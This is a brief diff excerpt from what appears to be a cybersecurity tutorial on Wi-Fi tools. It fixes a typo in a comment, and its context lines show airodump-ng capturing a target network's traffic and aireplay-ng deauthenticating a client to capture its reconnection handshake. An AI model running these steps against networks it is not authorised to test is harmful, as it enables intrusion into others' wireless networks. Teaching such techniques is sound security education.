Moremar/IT_tutorials/CyberSecurity/Security/Tools.md

 airodump-ng --channel <CHANNEL> --bssid <BSSID> --write MyHackedTraffic wlan0mon

 # force an authenticated client to deconnect, so we can capture its reconnection traffic
-# authenticated clients are listed by airdump-ng
+# authenticated clients are listed by airodump-ng
 aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon

 # Keep above command running and in another terminal send an auth request